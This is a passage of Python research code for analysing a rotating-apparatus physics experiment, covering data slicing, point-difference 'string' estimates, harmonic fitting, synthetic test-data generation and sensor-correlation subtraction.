endIs=endIs[:-Norphans]\r\n\r\n newShape=[int(startIs.size/t_0.shape[-1]), t_0.shape[-1]]\r\n else: \r\n newShape=[endIs.size]\r\n\r\n indxL=empty(newShape, dtype='O')\r\n indxL.ravel()[:]=[np.r_[sI:eI] for sI,eI in zip(startIs, endIs)]\r\n\r\n return indxL\r\n\r\ndef sliceReduceData(x, y, x0, delta_x=None,endTimes=None, functionL=[np.size, np.mean, lambda vals, **kwargs: np.std(vals, **kwargs)/sqrt(np.size(vals))], bJustGiveCuts=False ):\r\n \"\"\"Cut the given x data at points starting from x0, and going to x0+delta_x, and perform the functions in functionL on each cut section. \r\n\r\n Returns meanXs. finalL, indxL\r\n \"\"\"\r\n \r\n if endTimes is None:\r\n endTimes = x0 + delta_x\r\n indxL=sliceSorted(x, x0, t_end=endTimes);\r\n\r\n if y.ndim==1:\r\n y=y[newaxis,:]\r\n tPtsL=[x[inds] for inds in indxL.flat]\r\n\r\n finalL=[]\r\n for yax in y:\r\n\r\n yPtsL=[yax[inds] for inds in indxL.flat]\r\n resL=[]\r\n for f in functionL: #Apply each function in the list to the cuts\r\n vals=[f(ys, axis=0) for ys in yPtsL]\r\n vals=array(vals).reshape(indxL.shape)\r\n resL.append(vals)\r\n processedL=np.array(resL)\r\n finalL.append(processedL)\r\n \r\n meanXs= (x0+endTimes)/2.# delta_x/2. # The mean time for each cut\r\n meanXs=meanXs.ravel()[:indxL.size].reshape(indxL.shape)\r\n\r\n if len(finalL)==1:\r\n finalL=finalL[0]\r\n return meanXs, finalL, indxL \r\n\r\ndef stringSimple3pt(x, err=None):\r\n coeffs=array([0.25, -0.5, 0.25])\r\n coeffs/=abs(coeffs).sum()\r\n cnv=convolve1d(x, coeffs, axis=0, mode='constant')[1:-1]\r\n if len(cnv.shape)>1:\r\n res=cnv.mean(axis=1) # Or median?\r\n if err is not None:\r\n raise ValueError(\"if x is 2d, this function will calculate errors so errors shouldn't be included\")\r\n err3pt = std(cnv, axis=1)/sqrt(x.shape[0])\r\n else: \r\n res=cnv\r\n err3pt= sqrt(convolve(err**2, coeffs**2,mode='valid'))\r\n st3pt=res* (arange(res.size)%2-0.5)*-2 #Multiply by [1,-1,1,-1]....\r\n\r\n\r\n return st3pt, err3pt\r\n\r\ndef stringSimple5pt(x, err=None, rotDir=1.):\r\n \"\"\"Calculate 5pt strings and errors\r\n \"\"\"\r\n #coeffs=array([0.25, -0.5, 0.25]) #Copy coefficients from matlab code\r\n coeffs=array([\r\n [ 0.25 , 0., -0.5, 0. , 0.25],\r\n [-0.25 , 0.5 , 0. , -0.5 , 0.25],\r\n [ 0.125 , -0.25 , 0.25 , -0.25 , 0.125 ]])\r\n #coeffs=array([[1.,0.,-2.,0.,1.], #1h0\r\n # [-1,2.,0.,-2.,1.], #1h90\r\n # [1,-2, 2, -2, 1]], #2h0\r\n # )\r\n #coeffs.T[:]/=abs(coeffs).sum(axis=1)\r\n N=len(x)-4\r\n resA=zeros([N, 4])\r\n errA=zeros([N, 4])\r\n for cf, r, e in zip(coeffs, resA.T, errA.T):\r\n cnv=convolve1d(x, cf, axis=0, mode='constant')[2:-2]\r\n #cnv=convolve1d(x, coeffs, axis=0, mode='constant')[2:-2]\r\n if len(cnv.shape)>1: #If x is 2d, we'll assume that each column represents repeated measurements of the same value\r\n thisRes=cnv.mean(axis=1) # (Maybe median would be better here?)\r\n if err is not None:\r\n raise ValueError(\"if x is 2d, this function will calculate errors so errors shouldn't be included\")\r\n thisErr = std(cnv, axis=1)/sqrt(x.shape[0])\r\n else: \r\n res=cnv\r\n thisErr= sqrt(convolve(err**2, cf**2,mode='valid')[2:-2])\r\n r[:]=thisRes\r\n e[:]=thisErr\r\n resA[:,-1]*=nan\r\n res1h=(resA[:,0] + 1j*resA[:,1])*exp(-1j*pi/2*arange(N))#%2-0.5)*-2\r\n err1h=(errA[:,0] + 1j*errA[:,1])*exp(+1j*pi/2*arange(N)) #(arange(N)%2-0.5)*-2\r\n errA[:,0],errA[:,1]=abs(err1h.real), abs(err1h.imag)\r\n\r\n resA[:,0]=res1h.real\r\n resA[:,1]=res1h.imag\r\n resA[:,2]=resA[:,2]*(arange(N)%2-0.5)*-2\r\n\r\n #st0=res[::2]\r\n #st90=res[1::2]\r\n #err0=err[::2]\r\n #err90=err[1::2]\r\n #st0=st0* (arange(st0.size)%2-0.5)*-2 #Multiply by [1,-1,1,-1]....\r\n #st90=st90* (arange(st90.size)%2-0.5)*-2 #Multiply by [1,-1,1,-1]....\r\n\r\n\r\n return resA.reshape([N,2,2]), errA.reshape([N,2,2])\r\n\r\ndef getHarmonicsFit( theta_in, x_in, errs_in=None, harmonics=[1], pars0=[1.,1.]):\r\n \"\"\"Calculate the harmonics present in the data x corresponding to phases theta.\r\n\r\n Here we'll fit to sin waves.\r\n Inputs theta_in, x_in, and errs_in may be 2d\r\n\r\n Returns:\r\n thL, ampL, covL (thetas, fitted a#mplitude, covariance- except currently only the diagonal components, i.e. variance)\r\n \"\"\"\r\n bOnlyOneHarmonic=False\r\n if not hasattr(harmonics, '__len__'): #If we haven't been given a list of harmonics, we'll assume it's a number\r\n bOnlyOneHarmonic=True\r\n\r\n theta_in=theta_in.ravel()\r\n x_in=x_in.ravel()\r\n #errs_in=errs_in[\r\n errs_in=errs_in.ravel()\r\n #if errs_in==None:\r\n #errs_in=ones(x.shape, dtype=x.dtype)\r\n #d_theta=theta[1]-theta[0]\r\n #theta=arange(0, d_theta*N, d_theta)\r\n N=theta_in.size\r\n thL=[]\r\n ampL=[]\r\n covL=[]\r\n chi2L=[]\r\n delt=0.1\r\n THx=theta_in[0]\r\n THy=THx+pi/2. #This is the sin phase, so it's before cos \r\n theta = theta_in-THx\r\n p_mn0=nanmean(x_in)\r\n #x=x_in-nanmean(x_in)\r\n x=x_in\r\n\r\n bSinQuad=True;\r\n bCosQuad=True;\r\n\r\n bTest=False\r\n if bTest:\r\n fig, [ax, ax2]=subplots(2,1)\r\n #ax=gca()\r\n ax.plot(theta_in, x)\r\n #ax.plot(theta_in, x_in, 'ro')\r\n ax.plot(theta_in, x, 'bo')\r\n for n in harmonics:\r\n if sum(abs(sin(theta[~isnan(x)])))/N <0.1: # Means there's not much data for the sin quadrature\r\n bSinQuad=False;\r\n if bSinQuad and bCosQuad:\r\n #[Ax, Ay, B], cov=nancurve_fit(lambda theta, ax,ay,b: ax*cos(n*theta)+ ay*sin(n*theta) + b, theta, x,p0=[0.5e-1,0.5e-1,1.],sigma=errs_in)# [0][0] #sin(n*theta)*x;\r\n f=lambda theta, ax,ay, mn: ax*sin(n*theta)+ ay*cos(n*theta) + mn\r\n [Ax, Ay, Xmn], cov=nancurve_fit(f, theta, x,p0=pars0+[p_mn0],sigma=errs_in**2, )#, absolute_sigma=True)# [0][0] #sin(n*theta)*x;\r\n if bTest:\r\n ax2.plot(theta_in, f(theta, Ax, Ay, Xmn))\r\n chi2= nansum((f(theta, Ax, Ay, Xmn)-x)**2*1./errs_in**2)/(sum(~isnan(x).ravel())-2)\r\n elif bCosQuad:\r\n #[Ax, B],cov=nancurve_fit(lambda theta, ax,b: ax*cos(n*theta) + b, theta, x,p0=[0.5e-1,1.],sigma=errs_in)\r\n f=lambda theta, ay, mn: ay*cos(n*theta) + mn\r\n [Ay, Xmn],cov=nancurve_fit(f, theta, x,p0=[pars0[0], p_mn0],sigma=errs_in)#, absolute_sigma=True)\r\n if bTest:\r\n ax2.plot(theta_in, f(theta, Ay, Xmn))\r\n Ax=nan\r\n THx=nan\r\n cov=array([[nan, nan], [nan, cov[0,0]]]) # Let's pretend we've got realy covariance\r\n chi2= nansum((f(theta, Ay, Xmn)-x)**2*1./errs_in**2)/(sum(~isnan(x).ravel())-1)\r\n elif bSinQuad: \r\n f=lambda theta, ax, mn: ax*sin(n*theta) + mn\r\n [Ax, Xmn],cov=nancurve_fit(f , theta, x,p0=[pars0[1], p_mn0],sigma=errs_in)#, absolute_sigma=True)\r\n if bTest:\r\n ax2.plot(theta_in, f(theta, Ax, Xmn))\r\n Ay=nan\r\n cov=array([[cov[0,0], nan], [nan, nan]]) # Cheating\r\n chi2= nansum((f(theta, Ax, Xmn)-x)**2*1./errs_in**2)/(sum(~isnan(x).ravel())-1)\r\n else:\r\n raise Exception('Error in getHarmonicsFit: input angles are probably unexpected?')\r\n \r\n if bTest:\r\n show()\r\n raw_input('Continue?')\r\n\r\n if bOnlyOneHarmonic:\r\n covL=cov\r\n ampL=(Ax,Ay)\r\n thL=(THx, THy)\r\n else:\r\n covL.append(cov)\r\n ampL.append((Ax,Ay))\r\n thL.append((THx, THy))\r\n chi2L.append(chi2)\r\n #covL.append(sqrt(diag(cov)))\r\n #covL.append((sqrt(cov_x[0][0]), sqrt(cov_y[0][0])))\r\n return thL, ampL, covL, chi2L\r\n\r\ndef mgStringHarmonics(theta, x, err=None, harmonics=[1], chi2Filter=inf):\r\n \"\"\" Input measurements x taken at angles theta0+ n* dtheta (assumed to be evenly spaced) and return harmonic components\r\n\r\n Returns: phi, amp, err, chi2\r\n where they each have the shape\r\n [ (val1, val2), (val1, val2)... ], where each tuple corresponds to a different harmonic and the individual components correspond to the different quadratures.\r\n incalculable values are replaced with \"nan\"\r\n\r\n That is, return the coefficients A1, A2 that fit the data for A1*sin(n*theta) + A2*cos(n*theta) for harmonic n, as well as standard deviations and chi^2\r\n \"\"\"\r\n # We'll assume that theta is evenly spaced for the moment\r\n assert(theta.shape[0]==x.shape[0])\r\n theta0=theta[0]\r\n dtheta=theta[1]-theta[0]\r\n if any(abs(diff(diff(theta)))>0.1): # Is the _change_ in step-size changing? (Why do we care??)\r\n if any(abs(abs(diff(theta))-pi) >0.1): #Maybe we're going back and forth by 180, in which case we can still operate\r\n raise ValueError(\"Theta values are apparently not evenly spaced. stringHarmonics can't handle this (yet)\")\r\n if (2*pi-0.05)%abs(dtheta) < 0.1:\r\n raise ValueError(\"string harmonics only implemented for dtheta that fits evenly into 2*pi\")\r\n\r\n #drnL=\r\n for H in harmonics:#range(4)+1: #count():\r\n rem=(pi+0.1)%(H*abs(dtheta))\r\n if abs(rem)<0.2: # Check that the angles are suitable, i.e. they're all at near 0, pi\r\n\r\n div=(pi)/(H*dtheta) #How many steps to get to a pi change in the signal\r\n nptString= round(2*abs(div)+1) #Use this to calculate the number of string points to use\r\n\r\n #Throw away outliers, without considering correlations\r\n if x.ndim>1:\r\n pterr=nanstd(x, axis=-1)\r\n pts=nanmean(x, axis=-1)\r\n else:\r\n pts=x\r\n badMask=isnan(pts)\r\n while 1:\r\n inv_variance=1./pterr**2\r\n inv_variance_sum=nansum(inv_variance[~badMask])\r\n sampleMean=nansum(pts[~badMask]*inv_variance[~badMask])/inv_variance_sum\r\n zsq=(pts-sampleMean)**2*inv_variance/inv_variance_sum\r\n zsq[badMask]=nan\r\n biggestDev=nanmax(zsq)\r\n if biggestDev>20 and 0:\r\n I=nanargmax(zsq)\r\n badMask[I]=True\r\n if sum(badMask)>5:\r\n badMask[:]=True\r\n vprint(\"Unrecoverable seq (too many points deviate)\")\r\n break\r\n else:\r\n break\r\n x[badMask]=nan \r\n \r\n #result = [[ nan, nan ]], [[ nan, nan ]], [[[ nan, nan ],[ nan,nan ]]], [[ nan, nan ]]\r\n minNumPts=2*nptString+1\r\n if nptString==3:\r\n st, stErr = stringSimple3pt(x, err)\r\n seq1, seqErr1, seqChi21= MT.fancy_column_stats(st, stErr, cf=3, chi2Max=chi2Filter, Nmin=5)\r\n result = array([[theta0, nan]]), array([seq1]), array([seqErr1]), array([seqChi21])\r\n elif nptString==5:\r\n st, stErr= stringSimple5pt(x, err, rotDir=sign(dtheta))\r\n seq1, seqErr1, seqChi21= MT.fancy_column_stats(st[:,0], stErr[:,0], cf=5, chi2Max=chi2Filter, Nmin=5)\r\n seq2, seqErr2, seqChi22= MT.fancy_column_stats(st[:,1], stErr[:,1], cf=5, chi2Max=chi2Filter, Nmin=5)\r\n result = array([[theta0, theta0-dtheta], [theta0, nan+theta0+abs(dtheta)/2]]), array([seq1, seq2]), array([seqErr1, seqErr2]), array([seqChi21, seqChi22])\r\n vprint(\"th:{}, seq2:{}\".format(theta0%(2*pi), seq2))\r\n else:\r\n print(\"nptString is {0}\".format(nptString))\r\n\r\n\r\n # CHI2 ELIMINATION\r\n ## While the set of string points doesn't fit a chi2 model, we eliminate the largest deviating points\r\n\r\n if 0:\r\n while 1:\r\n inv_variance=1./stErr**2; # Variance from individual error bars\r\n inv_variance_sum=nansum(inv_variance)\r\n ampFinal=nansum(st*inv_variance)/inv_variance_sum\r\n\r\n N=sum(~isnan(st))\r\n cf=3.*((N-1)/N)**2# 'Correlation factor': Used to be 2.54. This stuff is (ftm) worked out emprically\r\n degOfF=N/cf \r\n devSq=(st-ampFinal)**2*inv_variance\r\n chi2=nansum(devSq)/degOfF; #: = var(st)/varfromerrorbars Needs checking too.\r\n if chi2>chi2Filter:\r\n I=nanargmax(devSq)#/nanvar(st)\r\n #I=nanargmax(dev)\r\n st[I]=nan\r\n stErr[I]=nan\r\n if sum(~isnan(st))<minNumPts: #if we have too few points left\r\n vprint(\"too many bad string points (by chi2 limit) \"),\r\n st[:]=nan\r\n stErr[:]=nan\r\n ampFinal=nan\r\n break;\r\n else:\r\n break\r\n\r\n #Decide if there were too many points thrown out:\r\n N=sum(~isnan(st))\r\n if N < minNumPts and 1: #If there's less than a few independent string points remaining, we'll give up\r\n #vprint(\"Unrecoverable sequence\")\r\n return [(theta0, nan)], [(nan, nan)], [[[nan,nan],[nan,nan]]], [(nan, nan)]\r\n #adjDegOfF=stats.chi2.ppf(.5, N -2.549); #Adjusted degrees of freedom for calculating chi2\r\n cf=3.*((N-1)/N)**2# Used to be 2.54. This stuff is (atm) worked out emprically\r\n degOfF=N/cf \r\n chi2=nansum(((st-ampFinal)**2)*inv_variance)/degOfF; #: = var(st)/varfromerrorbars Needs checking too.\r\n\r\n errFinal=sqrt(nansum((st-ampFinal)**2*inv_variance/inv_variance_sum)/degOfF*sqrt(2))#/sqrt(1-stats.chi2.cdf(chi2, degOfF));\r\n\r\n #Assemble the results\r\n result= array([[nan, nan]]), array([[nan, nan]]), array([[[nan, nan], [nan, nan]]]), array([[nan, nan]])\r\n\r\n #result[0][0]=[theta0,nan]\r\n #result[1][0]=[ampFinal,nan]\r\n #result[2][0]=[[[errFinal,nan],[nan,nan]]]\r\n #result[3][0]=[[chi2,nan]]\r\n\r\n\r\n #return [(theta0, nan)], [(ampFinal, nan)], [[[errFinal,nan],[nan,nan]]], [(chi2, nan)]\r\n\r\n\r\n\r\n\r\n else:\r\n print(\"abs(rem)!<0.2 for dtheta = {0}, H = {1}. Can't do string analysis on these\".format(dtheta, H))\r\n #This should probably raise an exception\r\n\r\n result[0][0]=[nan,nan]\r\n result[1][0]=[nan,nan]\r\n result[2][0]=[[[nan,nan],[nan,nan]]]\r\n result[3][0]=[[nan,nan]]\r\n break;\r\n return result\r\n \r\ndef renameFieldMaybe(recArray, oldName, newName):\r\n names=list(recArray.dtype.names)\r\n try:\r\n I=names.index(oldName)\r\n names[I]=newName\r\n recArray.dtype.names=names\r\n except ValueError:\r\n pass;\r\n return recArray\r\n\r\ndef addFakeData(rawAmp, apparatusAngles=None,trigs=None, rotationRate=None, amp=1., sigma=0., phi=0, amp2=0, phi2=0, zeroingTime=100, fracDev=0, sizeDev=0.1, fastAddF=None, bBlankOriginalData=False):\r\n \"\"\" Add fake signal/noise to an existing signal\r\n\r\n \"\"\"\r\n sd=rawAmp.t\r\n sig=rawAmp.sig.copy()\r\n if bBlankOriginalData:\r\n sig*=0\r\n\r\n if apparatusAngles is not None:\r\n theta= 2*pi*sd +phi+ apparatusAngles[:,:,newaxis] # Angle of the apparatus with respect to the cosmo \r\n # Now to cut the data into 'sequences'\r\n #seqStartTimes=arange(0,totTime, secs2sd(rSpec.delay + rSpec.interval*rSpec.numRotations + zeroingTime))+startTime\r\n\r\n\r\n #thPtsL=[theta[inds] for inds in indxL.flat]\r\n #apparatusAngles=getAnglesFromRSpec(rSpec, numReps=len(pretrigs))/180.*pi\r\n #theta=hstack(array(thPtsL) +apparatusAngles.ravel()[:len(thPtsL)])\r\n #flat_ind=indxL.ravel() #OR something else??\r\n\r\n elif rotationRate is not None:\r\n theta= 2*pi*sd + phi + 2*pi*rotationRate*sd2secs(sd)\r\n else:\r\n raise ValueError(\"Need to include either apparatusAngles or rotationRate\")\r\n\r\n fast_noiseF=lambda t: random.normal(size=t.size, scale=sigma) if sigma>0 else 0\r\n\r\n sig+= amp*sin(theta) + amp2*sin(2*theta+phi2) #add base signal\r\n\r\n #Random outlier additions:\r\n sig+= where(rand(*sig.shape)>fracDev, 0, sizeDev)\r\n #hstack([zeros(inds.shape) if rand()>fracDev else sizeDev*ones(inds.shape) for inds in indxL.flat ])\r\n\r\n #Uniform noise\r\n #sd=hstack(tPtsL)\r\n sig+= fast_noiseF(sd)\r\n \r\n #Repetitive noise\r\n if fastAddF is not None:\r\n addN=hstack([fastAddF(sd2secs(tPts-tPts[0])) for tPts in tPtsL ])\r\n sig+=addN\r\n #sig[ind]+=fastAddF(sd[ind]-sd[ind[0]])\r\n\r\n if bTest:\r\n figure('TestAddFakeData')\r\n ax=subplot(311)\r\n plot(sd, sig,',')\r\n subplot(312, sharex=ax)\r\n plot(trigs.flatten(), apparatusAngles.flatten(),'-o')\r\n subplot(313)\r\n plot(trigs.flatten(),'o')\r\n\r\n return RawData(sd, sig)#SPDataSet('test', preloadDict={'fastD':[sd, sig, ['sig']]}, rSpec=rSpec)\r\n\r\n #return SPDataSet(fastD=[sd, sig, ['sig']])\r\n\r\n\r\n return cutAmpAdded\r\n\r\ndef makeTestData(rSpec, amp=1., amp2=0.0, sigma=5., N=100000, sampleRate=10, phi=0, phi2=0, zeroingTime=100, fracDev=0, sizeDev=0.1, fastAddF=None, startTime=0):\r\n \"\"\" Make up some data that the experiment _might_ have measured\r\n\r\n Plan: 1. Make a pure signal, and add some noise. 2. Calculate the component that would be measured in each orientation. 3. Add white noise.. \r\n \"\"\"\r\n\r\n S1cosmos=amp*exp(1j*phi)\r\n S2cosmos=amp2*exp(1j*2*phi2)\r\n\r\n totTime=secs2sd(N/sampleRate) #Total time of the set in sidereal days\r\n #zeroingTime=100 #How long to wait between sequences\r\n #phi=pi/3 #Signal phase\r\n sd= linspace(0,totTime, N) + startTime\r\n theta= 2*pi*sd # Angle of the room with respect to the cosmos\r\n fast_noiseF=lambda t: random.normal(size=t.size, scale=sigma)\r\n\r\n \r\n # Now to cut the data into 'sequences'\r\n seqStartTimes=arange(0,totTime, secs2sd(rSpec.delay + rSpec.interval*rSpec.numRotations + zeroingTime))+startTime\r\n\r\n trigs=makeTriggers(sd, rSpec, seqStartTimes=seqStartTimes, bIncludeExtraRot=True);\r\n #theta=theta/180*pi\r\n\r\n pretrigs=trigs[:,0]-secs2sd(rSpec.delay)\r\n startTimes=hstack([pretrigs[:,newaxis],trigs[:,:-1]])\r\n endTimes=trigs\r\n\r\n\r\n #tPtsL,thPtsL,indxL= sliceReduceData(sd, theta, x0=startTimes.ravel(), endTimes=endTimes.ravel(), bJustGiveCuts=True)\r\n #Get the indices divided up according to the triggers\r\n indxL= sliceSorted(sd, t_0=startTimes.ravel(), t_end=endTimes.ravel()) #indices of the points between each rotation\r\n tPtsL=[sd[inds] for inds in indxL.flat]\r\n thPtsL=[theta[inds] for inds in indxL.flat]\r\n\r\n apparatusAngles=getAnglesFromRSpec(rSpec, numReps=len(seqStartTimes+1))/180.*pi\r\n theta=hstack(array(thPtsL) +apparatusAngles.ravel()[:len(thPtsL)]) #angle of apparatus with respect to the cosmos\r\n \r\n sig=real(S1cosmos*exp(-1j*theta) + S2cosmos*exp(-1j*2*theta))\r\n #sig= amp*sin(theta + phi) + amp2*sin(2*theta + phi2)#Base signal\r\n\r\n #Random outlier additions:\r\n sig+=hstack([zeros(inds.shape) if rand()>fracDev else sizeDev*ones(inds.shape) for inds in indxL.flat ])\r\n\r\n #Uniform noise\r\n sd=hstack(tPtsL)\r\n sig+= fast_noiseF(sd)\r\n \r\n #Repetitive noise\r\n if fastAddF is not None:\r\n addN=hstack([fastAddF(sd2secs(tPts-tPts[0])) for tPts in tPtsL ])\r\n sig+=addN\r\n #sig[ind]+=fastAddF(sd[ind]-sd[ind[0]])\r\n\r\n if bTest:\r\n figure('TestMakeTestData')\r\n ax=subplot(311)\r\n plot(sd, sig,',')\r\n subplot(312, sharex=ax)\r\n plot(trigs.flatten(), apparatusAngles.flatten(),'-o')\r\n subplot(313)\r\n plot(trigs.flatten(),'o')\r\n\r\n return sd, sig#SPDataSet('test', preloadDict={'fastD':[sd, sig, ['sig']]}, rSpec=rSpec)\r\n #return SPDataSet(fastD=[sd, sig, ['sig']])\r\n\r\ndef group_by_axis(thetaIn):\r\n theta=thetaIn[~isnan(thetaIn)]\r\n absC=cos(theta)**2\r\n absS=sin(theta)**2\r\n sQ=mean(absS)\r\n cQ=mean(absC)\r\n #if any(theta%(2*pi)\r\n if any( abs(theta%(pi) -pi/2) <0.05 ) and abs(0.5-sQ <0.05) and abs(0.5 -cQ) <0.05: # If we have a near-uniform sampling of angles...\r\n thetaRef=0;\r\n\r\n else: # Otherwise we'll try to pick a good angle (This is not perfect by any means)\r\n thetaRef=arctan2(sQ, cQ);\r\n print(\"Data doesn't seem to be purely NS->EW. Setting main angle as {0} deg\".format(thetaRef/pi*180))\r\n #pdb.set_trace()\r\n absC=abs(cos(thetaIn-thetaRef))\r\n absS=abs(sin(thetaIn-thetaRef))\r\n\r\n xI=where(absC>0.99)[0] # Points \r\n yI=where(absS>0.99)[0] # P\r\n if len(yI)<4:\r\n vprint(\"Not enough data points for orthogonal quadrature. Set yI =[]\")\r\n yI=[]\r\n if MT.nearby_angles(thetaRef, pi/2, 0.1):\r\n xI,yI=yI,xI\r\n thetaRef=0\r\n return thetaRef, xI, yI\r\n\r\n\r\n\r\ndef rotate_sequence_amps(seqAmp, rotateTo=0):\r\n \"\"\"\r\n >>> N=100\r\n >>> th=linspace(0,20,N)%(2*pi)\r\n >>> sa= CorrelationData(linspace(0,1,N), sin(2*th), ones(N))\r\n\r\n \"\"\"\r\n rotAmp=deepcopy(seqAmp)\r\n for h in range(rotAmp.sig.shape[1]):\r\n #newThetas, newSig, newErr=zip(*[th, s, er for th, s, er in zip(sig.theta[:,h], sig.sig[:,h], sig.err[:,h])])\r\n zipped=zip(seqAmp.theta[:,h], seqAmp.sig[:,h], seqAmp.err[:,h]) \r\n rotAmp.theta[:,h], rotAmp.sig[:,h], rotAmp.err[:,h]=zip(*[MT.rotate_quadrature_sample(th*(h+1), s, er,\r\n rotateTo=rotateTo, debug=True) if not all(isnan(s)) else (th, s, er) for (th, s, er) in zipped])\r\n rotAmp.theta[:,h]/=(h+1)\r\n return rotAmp\r\n\r\ndef process_sequences_multifit(sig, sigSensL, sigSensVaryPhaseIs=[], subtractHarmsL=[], minFreq=None, maxFreq=None, bPlot=False, harmonic=1):\r\n \"\"\" \r\n \"\"\"\r\n h=harmonic-1\r\n varyPhaseIndL=[]\r\n #sig=CorrelationData(*[c[:,h::h+1] for c in s]) for s in sig]\r\n #sigSensL=[CorrelationData(*[c[:,h:] for c in s]) for s in sigSensL]\r\n t=sig.t[:,h,0]\r\n #_, sig1h, cov1h=MT.rotate_quadrature_sample(sig.theta[:,0,0], sig.sig[:,0], sig.err[:,0])\r\n thetaRef, xI, yI=group_by_axis(sig.theta[:,0]) \r\n\r\n vprint(\"Main angle (for sidereal fit): {0}\".format(thetaRef))\r\n sigRot=rotate_sequence_amps(sig, rotateTo=0)\r\n \r\n sigSensL=[rotate_sequence_amps(sigSens, rotateTo=thetaRef) for sigSens in\r\n sigSensL]\r\n yL=[sigSens.sig[:,h] for sigSens in sigSensL]\r\n if sigSensVaryPhaseIs:\r\n varyPhaseIndL.extend(sigSensVaryPhaseIs)\r\n print(\"Allowing phase for sensors at {0} to vary\".format(sigSensVaryPhaseIs))\r\n\r\n gdQuads=[]\r\n for k,th, s in zip(arange(sigRot.theta.shape[2]), sigRot.theta[:,h,:].T, sigRot.sig[:,h,:].T):\r\n notNan=th[~isnan(s)]\r\n if notNan.size:\r\n gdQuads.append(k)\r\n if not all(MT.nearby_angles(notNan, notNan.min(), 0.1)):\r\n vprint(\"Not all angles the same: maybe they're orthogonal?\")\r\n\r\n #yL.append(vstack([sin(2*pi*t+sig.theta[:,0]), cos(2*pi*t + sig.theta[:,0])]).T)\r\n #Lab frame signal\r\n dc=ones(t.size, dtype='f8')\r\n yL.append(vstack([dc, dc*0]).T)\r\n varyPhaseIndL.append(len(yL)-1)\r\n # Sidereal\r\n refThetas=sigRot.theta.copy()\r\n if len(gdQuads)==1:\r\n if 0 in gdQuads:\r\n refThetas[:,h,1]=refThetas[:,h,0]+pi/2/harmonic\r\n else:\r\n refThetas[:,h,0]=refThetas[:,h,1]-pi/2/harmonic\r\n\r\n yL.append(1*cos(2*harmonic*pi*t[:,newaxis]+harmonic*refThetas[:,h]))\r\n varyPhaseIndL.append(len(yL)-1)\r\n\r\n #Add the 3rd harmonic ot the list(if it's there), and let it vary phase\r\n for harm in subtractHarmsL:\r\n if sigRot.sig.shape[1]>=harm:\r\n #_, sigH, covH=MT.rotate_quadrature_sample(sig.theta, sig.sig[:,h-1], sig.err[:,h-1])\r\n yL.append(sigRot.sig[:,harm-1])\r\n varyPhaseIndL.append(len(yL)-1)\r\n else:\r\n print(\"{}th harmonic doesn't exist, can't subtract it\")\r\n\r\n #nanIs=isnan(sigRot.sig[:,0])\r\n sig2fit=sig\r\n fitparams, cov, adjchi2, res_obj=MF.orthogonal_multifit(t, sigRot.sig[:,h], yL,varyPhaseIndL, var=sigRot.err[:,h], minFreq=minFreq, maxFreq=maxFreq, bPlot=bPlot, bReturnFitObj=True)\r\n Nsensors=len(sigSensL)\r\n\r\n sensCoeffs=array(fitparams[:Nsensors])\r\n labCoeffs=array(fitparams[Nsensors:Nsensors+2])#-thetaRef\r\n labCov=cov[Nsensors:Nsensors+2, Nsensors:Nsensors+2]\r\n sidCoeffs=array(fitparams[Nsensors+2:Nsensors+4])#-thetaRef\r\n sidCov=cov[Nsensors+2:Nsensors+4, Nsensors+2:Nsensors+4]\r\n sidAmp=SiderealFitData(t=nanmean(t), sig=sidCoeffs, err=sidCov, \r\n chi2=adjchi2, \r\n labTheta=array([0,pi/2]),#0*nanmean(-sigRot.theta[:,0], axis=0) ,\r\n sidTheta=None,\r\n meta=None)\r\n labAmp=LabSetData(t=nanmean(t), sig=labCoeffs, err=labCov, chi2=None, labTheta=array([0.,pi/2]))\r\n #print(\"subtract fit params: {0}\".format(res_obj.params))\r\n\r\n\r\n # Convert data types down here\r\n #sigSubtracted=sig._replace(sig=(sig.sig.ravel()-sensCoeffs*array(sigSensL)).reshape(sig.sig.shape))\r\n\r\n return labAmp, sidAmp, None, res_obj\r\n\r\ndef subtract_correlations(sig, sigSensL, dontSubtract=[], scaleFact=None, minFreq=0.00005, maxFreq=None, bPlot=False):\r\n \"\"\" \r\n \"\"\"\r\n # Interpolate sigSensor to be the same as sig (if necessary))\r\n\r\n sigSensL=[interp(sig.t.ravel(), sigSens.t.ravel(), sigSens.sig.ravel()) for sigSens in sigSensL]\r\n\r\n sigSig=MT.naninterp(sig.sig.ravel())\r\n sigSensL=[MT.naninterp(sigSens) for sigSens in sigSensL]\r\n\r\n if minFreq is not None or maxFreq is not None: #Filter\r\n fs=1/median(diff(MT.nonnan(sig.t.ravel())))/(3600*24)\r\n if minFreq is not None and maxFreq is not None:\r\n sigFilt=MF.butter_bandpass_filter(sigSig, [minFreq, maxFreq], fs)\r\n sigSensL=[MF.butter_bandpass_filter(sigSens, [minFreq, maxFreq], fs) for sigSens in sigSensL]\r\n elif maxFreq is not None:\r\n sigFilt=MF.butter_lowpass_filter(sigSig, maxFreq, fs)\r\n sigSensL=[MF.butter_lowpass_filter(sigSens, maxFreq, fs) for sigSens in sigSensL]\r\n elif minFreq is not None:\r\n sigFilt=MF.butter_highpass_filter(sigSig, minFreq, fs)\r\n sigSensL=[MF.butter_highpass_filter(sigSens, minFreq, fs) for sigSens in sigSensL]\r\n else:\r\n sigFilt=sigSig\r\n #sigSensL=sigSensL\r\n\r\n # if @scaleFact is None, try to do a least-squares fit (or maybe something else in the longer-term)\r\n if scaleFact is None:\r\n t=MT.naninterp(sig.t.ravel())\r\n if hasattr(sig,'theta'):\r\n theta=sig.theta\r\n elif hasattr(sig, 'labTheta'):\r\n theta=sig.labTheta\r\n else:\r\n theta=None\r\n if theta is not None:\r\n theta=MT.naninterp(theta)\r\n dontSubtractD={ #Make these lambda functions so we won't evaluate them unless necessary\r\n 'lab_sinusoid': lambda: array((sin(theta), cos(theta))),\r\n 'sid_sinusoid': lambda: array((sin(2*pi*t+theta), cos(2*pi*t+theta)))\r\n }\r\n exog=array(sigSensL).T\r\n for st in dontSubtract: #Elements should either be functions (of t) or strings \r\n arr=dontSubtractD[st]()\r\n exog=hstack([exog,arr.T])\r\n endog=sigFilt\r\n exog=sm.add_constant(exog,prepend=False)\r\n model=sm.WLS(endog, exog, missing='drop') #(?)\r\n res=model.fit()\r\n scaleFact=array(res.params[:len(sigSensL)])\r\n print(\"subtract fit params: {0}\".format(res.params))\r\n\r\n\r\n sigSubtracted=sig._replace(sig=(sig.sig.ravel()-scaleFact*array(sigSensL)).reshape(sig.sig.shape))\r\n\r\n if bPlot or 1:\r\n figure()\r\n plot(t, sigFilt, '.')\r\n plot(t, exog, '.')\r\n plot(t, (scaleFact*array(sigSensL)).T)\r\n return sigSubtracted\r\n\r\ndef preprocess_raw(rawAmp, trigTimes, sigWindow):\r\n #vprint(\"using 